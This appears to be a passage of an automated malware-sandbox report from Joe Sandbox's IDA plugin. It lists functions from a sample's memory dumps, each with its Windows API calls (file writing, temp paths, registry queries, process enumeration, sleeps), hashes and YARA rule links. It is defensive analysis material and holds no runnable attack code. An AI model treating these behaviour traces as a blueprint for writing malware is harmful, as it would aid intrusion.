                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CriticalSection$CloseEnterHandleLeave
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2394387412-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6cb46deeaee6e033954270298ebacf359d9729c0c55039351eed7836657fb5ab
                                                                                                                                                                                                                                                                                            • Instruction ID: 482a73de583927dbf92fb41f096d285271c0d250dba2db43d0d67f9ae66103fb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6cb46deeaee6e033954270298ebacf359d9729c0c55039351eed7836657fb5ab
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B118E74500208EFDB20CF94E4487DE7BB1FB8D399F18854AE91527364C7709A81DF40
                                                                                                                                                                                                                                                                                            Function 0143426A Relevance: 4.5, APIs: 3, Instructions: 40sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064), ref: 014342B3
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00004E20), ref: 014342D4
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 014342DE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExitObjectSingleSleepThreadUserWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 295063474-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8dc08e49dfc531f1f9f4f294e09b61a1413210a29983cc0e6dd8734b4324feff
                                                                                                                                                                                                                                                                                            • Instruction ID: e771ae336fb5480bacedc65e92f6956fdbbd2c467c1871e4dc6bf660ff2fdedf
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8dc08e49dfc531f1f9f4f294e09b61a1413210a29983cc0e6dd8734b4324feff
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D01AD70A10208EBEB10CFA4E904BAEB7B5AB88748F184159E601B63E4D7B29E10DB51
                                                                                                                                                                                                                                                                                            Function 01442FFF Relevance: 4.5, APIs: 3, Instructions: 34fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: GetTempPathA.KERNEL32(00000080,?,?), ref: 0143A78C
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: lstrlen.KERNEL32(?), ref: 0143A796
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: lstrcat.KERNEL32(?,01433CC0), ref: 0143A7B2
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: lstrcpy.KERNEL32(?,00000000), ref: 0143A7CF
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: lstrlen.KERNEL32(?,01432880,?), ref: 0143A7FD
                                                                                                                                                                                                                                                                                              • Part of subcall function 0143A75A: wsprintfA.USER32 ref: 0143A809
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0144302B
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,014126B0,00000401,00000000,00000000), ref: 0144304E
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 01443058
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Filelstrlen$CloseCreateHandlePathTempWritelstrcatlstrcpywsprintf
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 817978534-0
                                                                                                                                                                                                                                                                                            • Opcode ID: be64b7da3c395b46db74f14813a78b4856c6e17b2767a01cc6b08e396a2128db
                                                                                                                                                                                                                                                                                            • Instruction ID: 6cf5ba651c86fdf65cc3351b744bd9841eb64f84830fb60eeefdc0138f52395d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be64b7da3c395b46db74f14813a78b4856c6e17b2767a01cc6b08e396a2128db
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6F05BB5A40308BBE720DFB4DC4EF9D7B38A749B10F104654FB056B3D4D6B195448794
                                                                                                                                                                                                                                                                                            Function 014408CE Relevance: 4.5, APIs: 3, Instructions: 26sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 014408E2
                                                                                                                                                                                                                                                                                            • RtlLeaveCriticalSection.NTDLL(01449018), ref: 014408F4
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 0144090F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CriticalFreeGlobalLeaveSectionSleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2599486065-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c0d60bcd7d496068b69ae0f20caa17b48f892b15a656fbae107ebcca712c11b0
                                                                                                                                                                                                                                                                                            • Instruction ID: a49d2aacbfa9f293300994778a46ee577718c95b13bbaaa01e9581021d412727
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0d60bcd7d496068b69ae0f20caa17b48f892b15a656fbae107ebcca712c11b0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F05876E4020A8BFB249F98D80A7FEB770FB08716F00416AEB25A3690D7391911DF80
                                                                                                                                                                                                                                                                                            Function 01438BF1 Relevance: 3.9, APIs: 3, Instructions: 104sleepstringthreadCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(00000110,?), ref: 01438B3E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001770), ref: 01438B8E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0001D4C0), ref: 01438BB0
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 01438CD2
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(004B001E), ref: 01438D9D
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(001B7740), ref: 01438DAA
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 01438DD0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$ExitThreadUserWritelstrcpy
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3664100127-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9e8458abbe0abcd0f1fa30f556d57331150556686245257d253e87c53a13e0ff
                                                                                                                                                                                                                                                                                            • Instruction ID: 092f900f28f2c51983e48fdd9fb2fcf9d2c965a24fe606d4fbc4120e0b5e2d5a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e8458abbe0abcd0f1fa30f556d57331150556686245257d253e87c53a13e0ff
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7415FB0A0111ACBDB79CF04DDD07A9B7B5FBC8304F0485EAE60A56266D7346AC6CF48
                                                                                                                                                                                                                                                                                            Function 00AB11D6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00020000,0F4D8B55,2FA62CA8), ref: 00AB123D
                                                                                                                                                                                                                                                                                              • Part of subcall function 00AB5307: VirtualAlloc.KERNEL32(00000000,00AB62E9,00003000,00000004,?,00AB62E9,00000105), ref: 00AB5324
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocDeviceQueryVirtual
                                                                                                                                                                                                                                                                                            • String ID: ^;yN
                                                                                                                                                                                                                                                                                            • API String ID: 4189773976-1295057876
                                                                                                                                                                                                                                                                                            • Opcode ID: 90f328a40a59a087d3a60bb317625808acdef10dc43ac180d72fcb15a4a6eab3
                                                                                                                                                                                                                                                                                            • Instruction ID: 44c5332c62062393ae5d24f5b14879737c700cfaa7164073c4d3bfd265544e04
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90f328a40a59a087d3a60bb317625808acdef10dc43ac180d72fcb15a4a6eab3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A21F631D0431C6AEB159B94D962BEEBBBCDF40310F5000A9E105A61C3DBB59BC5CBE5
                                                                                                                                                                                                                                                                                            Function 00AB62A1 Relevance: 3.1, APIs: 2, Instructions: 66registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNEL32(?,00000104,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 00AB62D9
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(850FC084), ref: 00AB632B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00AB5307: VirtualAlloc.KERNEL32(00000000,00AB62E9,00003000,00000004,?,00AB62E9,00000105), ref: 00AB5324
                                                                                                                                                                                                                                                                                              • Part of subcall function 00AB538C: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00AB1DBA,00000000), ref: 00AB53AD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Virtual$AllocCloseFreeQueryValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3311923045-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b797f78465ffec3178f9feced315cfae8816b821409cb8f56e1ee295ab16ba5a
                                                                                                                                                                                                                                                                                            • Instruction ID: 2897212efe97687fb2739c23ac7c0ddd3284c3a39283dd70789a8fda8b522607
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b797f78465ffec3178f9feced315cfae8816b821409cb8f56e1ee295ab16ba5a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF113DB6D00108BEEB059FE4DD82EDEBBBCEF44394F204055F615E6151EA719E40DB50
                                                                                                                                                                                                                                                                                            Function 00AB5870 Relevance: 3.0, APIs: 2, Instructions: 49processCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,2FA62CA8,00000001), ref: 00AB588E
                                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AB58D4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2353314856-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a8b42a2fe86ae43d3c53eea1046a7b114230e273e528740491d4a444d06e3ad7
                                                                                                                                                                                                                                                                                            • Instruction ID: f2233ce92de202cb097f2941a72e9c6804ea9e860b008878e2431ebefca243c6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8b42a2fe86ae43d3c53eea1046a7b114230e273e528740491d4a444d06e3ad7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FF0AF3290562439E61076F4AC4BFEE37DC8B05364F60025AF526A60D3E9A499856AA1
                                                                                                                                                                                                                                                                                            Function 0143C89A Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(000001D8,00000006,00000000,00000000,00015400), ref: 0143C8D1
                                                                                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0143C900
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileView$Unmap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3282598733-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8bc153028acd8627fb5f1fcc04e15514c35c8610fb8e9a6c659c32f491764358
                                                                                                                                                                                                                                                                                            • Instruction ID: 40940eb7fbe6f7d5f8a6151e4139faaf088b69423c94e1b8e687d665250887fc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bc153028acd8627fb5f1fcc04e15514c35c8610fb8e9a6c659c32f491764358
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84F0AF74A00308FBDB24DFA8D889B9D7BB8AB48705F20418AFA046B2E4D3B55684CB44
                                                                                                                                                                                                                                                                                            Function 01436274 Relevance: 3.0, APIs: 2, Instructions: 26fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,01432104), ref: 014362A8
                                                                                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000204,00000006,00000000,00000000,00008000), ref: 014362CE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$CreateMappingView
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3452162329-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d263e750b15fe534d6fdfe915ab034265973b529cbce5ef4eda78a71c3327079
                                                                                                                                                                                                                                                                                            • Instruction ID: 89e6f592d155cd1c804e52483329686fae2e15b5c855484a94b67b46a0e24c1d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d263e750b15fe534d6fdfe915ab034265973b529cbce5ef4eda78a71c3327079
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF0ACF8680300BBF3309B64FC49B523BA4B308B1CF204105FB155A6E8C6B62448DB54
                                                                                                                                                                                                                                                                                            Function 014414A1 Relevance: 3.0, APIs: 2, Instructions: 18sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 014414B5
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000400), ref: 014414C0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseFindSleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1358061995-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 39bb5195b3bb536733debd5a6b56525f44083c163d584d800c3f4a660af85c94
                                                                                                                                                                                                                                                                                            • Instruction ID: 322411ba7cf98757f3e1e5c86f6693ead55882ebd4553c5d25efc3d307a199da
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39bb5195b3bb536733debd5a6b56525f44083c163d584d800c3f4a660af85c94
